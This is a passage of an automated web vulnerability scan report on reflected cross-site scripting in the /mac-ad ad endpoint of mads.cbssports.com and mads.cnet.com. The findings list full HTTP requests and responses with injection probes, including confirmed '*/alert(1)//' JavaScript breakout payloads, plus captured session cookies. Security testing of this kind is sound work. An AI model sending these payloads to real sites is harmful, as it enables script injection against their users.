GET /mac-ad?SP=16&_RGROUP=15445&NCAT=22052%3a22135%3a&CNET-BRAND-ID=59&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=175&ASSET_HOST=adimg.cbssports.com&PTYPE=2000&CNET-ONTOLOGY-NODE-ID=1&&&&POS=100&ENG:DATETIME=2011.04.27.19.36.28&SYS:RQID=01phx1-ad-e12:4DB851BE40F72&&REFER_HOST=www.cbssports.com&&&&&DVAR_USER=anon&CNET-PAGE-GUID=TbioeQq0GW4AAECD6wA&adfile=10874/12/503994_wc.ca93ac9<a>06b8679e39a HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://mads.cbssports.com/mac-ad?celt=ifc&SP=16&POS=100&SITE=175&BRAND=59&NCAT=22052:22135:&NODE=1&PTYPE=2000&PGUID=TbioeQq0GW4AAECD6wA&DVAR_USER=anon&STAGING=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; last_access=1303947385; fsr.a=1303947398395

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:17 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 27 Apr 2011 23:40:17 GMT
Content-Length: 718


...[SNIP]...

3.608. http://mads.cbssports.com/mac-ad [celt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the celt request parameter is copied into the HTML document as plain text between tags. The payload c13ec<a>c6951ab47b0 was submitted in the celt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?celt=ifcc13ec<a>c6951ab47b0&SP=110&POS=100&SITE=175&BRAND=59&NCAT=22052:22135:&NODE=1&PTYPE=2000&PGUID=TbioeQq0GW4AAECD6wA&DVAR_USER=anon&STAGING=0 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.a=1303947395389; last_access=1303947385

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:38:04 GMT
Server: Apache/2.2
Content-Length: 462
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 23:38:04 GMT


...[SNIP]...

3.609. http://mads.cbssports.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 5f543<a>511a25da366 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=15f543<a>511a25da366&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:06:33 GMT
Server: Apache/2.2
Content-Length: 590
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:06:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=15f543<a>511a25da366&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID
...[SNIP]...

3.610. http://mads.cbssports.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload c07fa*/alert(1)//aca8b8d1443 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1c07fa*/alert(1)//aca8b8d1443&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:56 GMT
Server: Apache/2.2
Content-Length: 1640
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:56 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1c07fa*/alert(1)//aca8b8d1443&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.611. http://mads.cbssports.com/mac-ad [has_takeover parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the has_takeover request parameter is copied into the HTML document as plain text between tags. The payload 22569<a>e08a2c543a2 was submitted in the has_takeover parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=022569<a>e08a2c543a2&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:07:39 GMT
Server: Apache/2.2
Content-Length: 589
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:07:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=022569<a>e08a2c543a2&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON TEXT) *//* MAC [
...[SNIP]...

3.612. http://mads.cbssports.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a49c8<a>7d4940233c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1&a49c8<a>7d4940233c1=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:11:40 GMT
Server: Apache/2.2
Content-Length: 593
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:11:40 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1&a49c8<a>7d4940233c1=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-
...[SNIP]...

3.613. http://mads.cbssports.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload d6452*/alert(1)//7a87f8e4d2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1&d6452*/alert(1)//7a87f8e4d2d=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:28 GMT
Server: Apache/2.2
Content-Length: 1643
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:42:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1&d6452*/alert(1)//7a87f8e4d2d=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.614. http://mads.cbssports.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload 5bd7d<a>1d78e55997b was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=445517445bd7d<a>1d78e55997b&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:08:46 GMT
Server: Apache/2.2
Content-Length: 589
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:08:46 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=445517445bd7d<a>1d78e55997b&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncode
...[SNIP]...

3.615. http://mads.cbssports.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 52b1c*/alert(1)//88a53a41f5d was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6704058152b1c*/alert(1)//88a53a41f5d&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:27 GMT
Server: Apache/2.2
Content-Length: 1641
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:27 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6704058152b1c*/alert(1)//88a53a41f5d&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.616. http://mads.cnet.com/mac-ad [&&&&&&adfile parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the &&&&&&adfile request parameter is copied into the HTML document as plain text between tags. The payload 760d7<a>9f9348f2267 was submitted in the &&&&&&adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?&_RGROUP=13054&&CNET-BRAND-ID=25&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=7&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.04.27.17.56.16&SYS:RQID=01phx1-ad-e18:4DB83440712099&&REFER_HOST=tag.admeld.com&&&&&&&adfile=2443/11/501881_wc.ca760d7<a>9f9348f2267 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://mads.cnet.com/mac-ad?CELT=ifc&BRAND=25&SITE=7&ADSTYLE=NOOVERGIF&_RGROUP=13054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; arrowLat=1303941361935; arrowSpc=1; MADTEST=1; mad_rsi_segs=; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:08:41 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 27 Apr 2011 22:08:41 GMT
Content-Length: 594


...[SNIP]...

3.617. http://mads.cnet.com/mac-ad [&adfile parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the &adfile request parameter is copied into the HTML document as plain text between tags. The payload 7adc3<a>f417d78ed1e was submitted in the &adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?&_RGROUP=17232&&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.04.27.19.18.23&SYS:RQID=00phx1-ad-e21:4DB86AC840F7D9&&REFER_HOST=tag.admeld.com&&&&&DVAR_LB_MPU=1&&adfile=2139/11/440452_wc.ca7adc3<a>f417d78ed1e HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://mads.cnet.com/mac-ad?CELT=ifc&BRAND=55&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=17232
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; arrowTmUser=false; cnet_rvpCallout=2; arrowLrps=1303941361935; arrowLat=1303946196991; arrowSpc=6; wsFd=true; arrowFdCounter=-1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:45 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 27 Apr 2011 23:23:45 GMT
Content-Length: 608


...[SNIP]...

3.618. http://mads.cnet.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cnet.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 8d81b<a>21414ae266b was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

